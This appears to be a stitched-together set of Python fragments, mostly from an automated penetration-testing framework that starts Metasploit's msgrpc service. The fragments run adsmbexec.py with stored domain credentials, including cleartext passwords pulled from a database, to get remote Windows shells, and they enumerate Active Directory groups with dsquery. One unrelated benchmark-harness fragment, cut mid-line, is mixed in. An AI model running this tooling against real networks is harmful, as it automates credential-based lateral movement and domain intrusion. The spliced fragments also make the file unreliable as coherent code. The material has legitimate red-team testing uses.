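def startMetasploit(self, username, password, port):
    """Launch ``msfconsole`` and load the msgrpc plugin on *port*.

    Spawns the console through ``asyncproc``, waits for the console prompt,
    then writes ``load msgrpc`` with the supplied credentials and waits for
    the plugin's "Successfully loaded" line.  Gives up after 60 seconds and
    then tries to kill the console.

    Args:
        username: msgrpc user name handed to the plugin.
        password: msgrpc password handed to the plugin.
        port: TCP port the msgrpc server listens on.

    Side effects:
        Sets ``self.metasploitProcess``; reports progress on stdout.
    """
    print("starting metasploit ...")
    # The prompt contains ANSI escapes; comparing repr() of both sides keeps
    # the escape bytes literal in the match.
    prompt_marker = repr("\x1b[4mmsf\x1b[0m \x1b[0m> ")
    rpc_started = False
    rpc_running = False
    self.metasploitProcess = asyncproc.Process(
        "msfconsole -m software/metasploit/modules/".split())
    start_time = time.time()
    while not rpc_running:
        if time.time() - start_time >= 60:
            print("timeout.will try again")
            break
        poll = self.metasploitProcess.wait(os.WNOHANG)
        if poll is not None:
            # NOTE(review): the original had a `break` commented out here, so
            # an exited console only slows the loop down instead of ending
            # it; confirm that is intended.
            time.sleep(1)
        out = self.metasploitProcess.read()
        got_console = False
        if out != "":
            if repr(out).find(prompt_marker) != -1:
                got_console = True
            if rpc_started and out.find("Successfully loaded plugin: msgrpc") != -1:
                rpc_running = True
        if got_console and not rpc_started:
            time.sleep(1)
            self.metasploitProcess.write(
                "load msgrpc User={0} Pass={1} ServerPort={2}\n".format(
                    username, password, port))
            rpc_started = True
    if rpc_running:
        # The password is deliberately not echoed: stdout of this tool is
        # routinely captured into logs, and the original line printed it.
        print("metasploit running on 127.0.0.1:{0} with user {1}".format(
            port, username))
    else:
        print("there was a error starting the metasploit console")
        try:
            # NOTE(review): kill(0) follows os.kill semantics only if asyncproc
            # forwards the number unchanged, in which case it merely probes
            # the pid; confirm this actually terminates the console.
            self.metasploitProcess.kill(0)
        except Exception:
            # best effort: the console may already be gone
            pass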
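def GetProcess(params, domain, username, password, host):
    """Start ``adsmbexec.py`` against *host* and wait for its shell banner.

    Polls the child's output for up to 60 seconds, echoing it to stdout.

    Args:
        params: job context; only ``params.log`` is used here.
        domain, username, password: credentials handed to ``adsmbexec.py``
            as a single ``domain/user:password@host`` argument.
        host: target host name or address.

    Returns:
        The ``asyncproc.Process`` once the output contained "Windows", or
        when the 60 s deadline passed without a verdict; ``None`` when the
        output reported "SMB SessionError".
    """
    target = "{}/{}:{}@{}".format(domain, username, password, host)
    proc = asyncproc.Process(["./software/adsmbexec.py", target])
    # params.log output is persisted elsewhere; the original wrote the
    # cleartext password into it, so it is redacted here.
    params.log("./software/adsmbexec.py {}/{}:{}@{}".format(
        domain, username, "********", host))
    deadline = time.time() + 60
    while True:
        proc.wait(os.WNOHANG)  # reap the child if it exited; result unused
        out = proc.read()
        time.sleep(0.25)
        if time.time() >= deadline:
            # NOTE(review): on timeout the still-running child is returned,
            # not terminated; the caller is responsible for killing it.
            break
        if out == "":
            continue
        print(out)
        if "Windows" in out:
            break
        if "SMB SessionError" in out:
            proc = None
            break
        # "The target principal name is incorrect" and "'dsquery' is not
        # recognized ..." only set a flag the original never read; no action.
    return proc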
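def __init__(self, cmd, env=None):
    """Spawn *cmd* through ``asyncproc`` with its stderr discarded.

    Args:
        cmd: the command to run, in whatever form ``asyncproc.Process``
            accepts.
        env: environment mapping for the child; ``None`` (or any other
            falsy value) gives the child an empty environment.
    """
    # `open` replaces the Python-2-only `file` builtin.  The sink is kept on
    # the instance so it can be closed explicitly rather than leaking until
    # garbage collection.
    self._stderr_sink = open("/dev/null", "w")
    self.process = asyncproc.Process(cmd, stderr=self._stderr_sink,
                                     env=env or {})
    self._read_buffer = ""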
'--args', dest='args', help='Command line arguments to pass to --executable') parser.add_option('-n', '--num_trials', type='int', default=10000, dest='num_trials', help='The number of iterations to run') (options, args) = parser.parse_args() process_args = [ options.executable, ] process_args.extend(options.args.split(' ')) process = asyncproc.Process(process_args) line = '' while not line.strip() == 'READY': line = process.read() line = '' start = datetime.datetime.now() for i in xrange(options.num_trials): process.write('GO\n') found_ready = False while not found_ready: data = process.read() # Note: This isn't very robust. If a read returns part of the READY # token (e.g. REA) we don't buffer it and won't notice when the rest of # the token appears next time.
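# Output markers (upper-cased) after which the credential is marked unusable
# and the child is discarded.
_SHELL_FAILURES = (
    "STATUS_SHARING_VIOLATION",
    "SMB SESSIONERROR",
    "RPC_X_BAD_STUB_DATA",
    "UNEXPECTED ANSWER FROM SERVER",
)
# Output markers (upper-cased) that mark the credential unusable but leave
# the child running.
_CREDENTIAL_WARNINGS = (
    "THE TARGET PRINCIPAL NAME IS INCORRECT",
    "'DSQUERY' IS NOT RECOGNIZED AS AN INTERNAL OR EXTERNAL COMMAND",
)
_DSQUERY_MISSING = "'dsquery' is not recognized as an internal or external command"


def _mark_dgu_failed(params, map_id):
    """Flag credential-map row *map_id* as failed for domain group gathering."""
    cursor = params.db.cursor()
    cursor.execute(
        "update domain_credentials_map set dgu_failed = true where id = %s",
        (map_id, ))
    cursor.close()


def _wait_for_shell(params, proc):
    """Poll *proc* for up to 60 s for a shell banner or a known error line.

    Every non-empty chunk of output is passed to ``params.log``.

    Returns:
        ``(proc, got_shell, bad_credential)`` where ``proc`` is ``None`` if
        the child was discarded after a fatal error line.
    """
    got_shell = False
    bad_credential = False
    deadline = time.time() + 60
    while True:
        proc.wait(os.WNOHANG)  # reap the child if it exited; result unused
        out = proc.read()
        time.sleep(0.25)
        if time.time() >= deadline:
            params.log("too much time has passed. quitting")
            break
        if out == "":
            continue
        params.log(out)
        upper = out.upper()
        if "WINDOWS" in upper:
            got_shell = True
            break
        if any(marker in upper for marker in _SHELL_FAILURES):
            proc = None
            bad_credential = True
            break
        if any(marker in upper for marker in _CREDENTIAL_WARNINGS):
            # TODO update this host, set psexec_failed = true
            bad_credential = True
    return proc, got_shell, bad_credential


def _record_groups(params, proc, domain_id):
    """Run ``dsquery group`` in the shell and store each group name.

    Stops at the first empty line or when the shell reports that dsquery
    is unavailable.  Every line is passed to ``params.log``.

    Returns:
        ``(out, bad_credential)`` — the raw dsquery output and whether
        dsquery was reported missing.
    """
    out = runCmd(proc, "dsquery group -limit 0")
    bad_credential = False
    for line in out.split("\n"):
        params.log(line)
        if _DSQUERY_MISSING in line:
            bad_credential = True
            break
        if line == "":
            break
        # Assumes lines look like "X=<name>,..."; the name is the value of
        # the first "=" pair.  Lines without "=" raised IndexError in the
        # original and are skipped here instead.
        first_part = line.split(",")[0]
        if "=" not in first_part:
            continue
        name = first_part.split("=")[1]
        if "{" not in name:
            cursor = params.db.cursor()
            cursor.execute("select addDomainGroup(%s, %s, %s)",
                           (params.footprint_id, domain_id, name, ))
            cursor.close()
    return out, bad_credential


def run(params):
    """Gather the group list of one pending domain and record it.

    Picks one (domain, credential, host) row that still needs information
    gathering, registers a task item for it, runs ``adsmbexec.py`` with the
    stored credential and — if a shell came up — stores every ``dsquery
    group`` result through ``addDomainGroup``.  A credential that failed is
    flagged ``dgu_failed``; a successful run flags the domain
    ``info_gathered``.  Finally the queued log lines are drained and stored
    through ``updateTaskStatus``.

    Args:
        params: job context exposing ``db`` (DB-API connection),
            ``footprint_id``, ``log()`` and ``log_queue``.

    Returns:
        None; all results are written to the database.
    """
    sql = """ select d.id, hd.ip_address, dc.domain, dc.username, dc.cleartext_password, m.id from domains d join domain_credentials dc on d.domain_name = dc.domain join domain_credentials_map m on m.domain_credentials_id = dc.id join host_data hd on m.host_data_id = hd.id where d.footprint_id = dc.footprint_id and d.footprint_id = hd.footprint_id and d.footprint_id = m.footprint_id and m.valid = true and d.info_gathered = false and m.psexec_failed = false and m.dgu_failed = false and d.id not in (select item_identifier from task_list where task_descriptions_id = 20 and footprint_id = %s and in_progress = true) and hd.footprint_id = %s order by username limit 1 """
    cursor = params.db.cursor()
    cursor.execute(sql, (params.footprint_id, params.footprint_id, ))
    row = cursor.fetchone()
    cursor.close()
    if row is None:
        return
    domain_id, host_ip, domain, username, password, map_id = row

    cursor = params.db.cursor()
    cursor.execute("select addTaskListItem(%s, 20, %s, true, false)",
                   (params.footprint_id, domain_id, ))
    task_id = cursor.fetchone()[0]
    cursor.close()

    # The log is drained into updateTaskStatus below, so the cleartext
    # password is redacted from the logged command line (the original
    # logged it verbatim).
    params.log("./software/adsmbexec.py {}/{}:{}@{}".format(
        domain, username, "********", host_ip))
    # NOTE(review): the credential is still passed as an argv element and is
    # therefore visible in the local process list while the child runs.
    proc = asyncproc.Process([
        "./software/adsmbexec.py",
        "{}/{}:{}@{}".format(domain, username, password, host_ip)])

    proc, got_shell, bad_credential = _wait_for_shell(params, proc)
    if bad_credential:
        _mark_dgu_failed(params, map_id)

    if got_shell:
        out, dsquery_missing = _record_groups(params, proc, domain_id)
        bad_credential = bad_credential or dsquery_missing
        time.sleep(0.5)
        proc.write("exit\n")
        time.sleep(2)
        if bad_credential:
            # May repeat the update above; it is idempotent.
            _mark_dgu_failed(params, map_id)
        if out != "" and not bad_credential:
            cursor = params.db.cursor()
            cursor.execute("update domains set info_gathered = true where id = %s",
                           (domain_id, ))
            cursor.close()

    # Drain the log queue; lines are joined with CRLF and no trailing one.
    lines = []
    while not params.log_queue.empty():
        lines.append("{0}".format(params.log_queue.get(False)))
    final_output = "\r\n".join(lines)
    cursor = params.db.cursor()
    cursor.execute("select updateTaskStatus(%s, %s, %s, %s)",
                   (task_id, False, True, base64.b64encode(final_output), ))
    cursor.close()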
def __call__(self, *args, **kwargs):
    """Run ``self.execPath`` with *args* and hand back its pipes.

    ``kwargs`` is accepted for call compatibility but is not used.

    Returns:
        A ``Pipes`` record wrapping the child's stdin, stdout and stderr.
    """
    argv = [self.execPath]
    argv.extend(args)
    child = asyncproc.Process(argv)
    return Pipes(i=child.stdin, out=child.stdout, err=child.stderr)
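def GetProcess(params, domain, username, password, host, map_id):
    """Start ``adsmbexec.py`` against *host* and wait for its shell banner.

    Polls the child's output for up to 60 seconds, echoing it to stdout.
    When the output shows the credential is unusable, the credential-map
    row *map_id* is flagged ``dgu_failed``.

    Args:
        params: job context; only ``params.db`` is used here.
        domain, username, password: credentials handed to ``adsmbexec.py``
            as a single ``domain/user:password@host`` argument.
        host: target host name or address.
        map_id: id of the ``domain_credentials_map`` row in use.

    Returns:
        The ``asyncproc.Process`` once the output contained "Windows", or
        when the 60 s deadline passed without a verdict; ``None`` when a
        fatal error line was seen.
    """
    fatal_markers = (
        "STATUS_SHARING_VIOLATION",
        "SMB SESSIONERROR",
        "RPC_X_BAD_STUB_DATA",
        "UNEXPECTED ANSWER FROM SERVER",
    )
    warning_markers = (
        "THE TARGET PRINCIPAL NAME IS INCORRECT",
        "'DSQUERY' IS NOT RECOGNIZED AS AN INTERNAL OR EXTERNAL COMMAND",
    )
    proc = asyncproc.Process([
        "./software/adsmbexec.py",
        "{}/{}:{}@{}".format(domain, username, password, host)])
    run_with_different_user = False
    deadline = time.time() + 60
    while True:
        proc.wait(os.WNOHANG)  # reap the child if it exited; result unused
        out = proc.read()
        time.sleep(0.25)
        if time.time() >= deadline:
            # NOTE(review): on timeout the still-running child is returned,
            # not terminated; the caller is responsible for killing it.
            break
        if out == "":
            continue
        print(out)
        upper = out.upper()
        if "WINDOWS" in upper:
            break
        if any(marker in upper for marker in fatal_markers):
            proc = None
            run_with_different_user = True
            break
        if any(marker in upper for marker in warning_markers):
            # TODO update this host, set psexec_failed = true
            run_with_different_user = True
    if run_with_different_user:
        cursor = params.db.cursor()
        cursor.execute(
            "update domain_credentials_map set dgu_failed = true where id = %s",
            (map_id, ))
        cursor.close()
    return proc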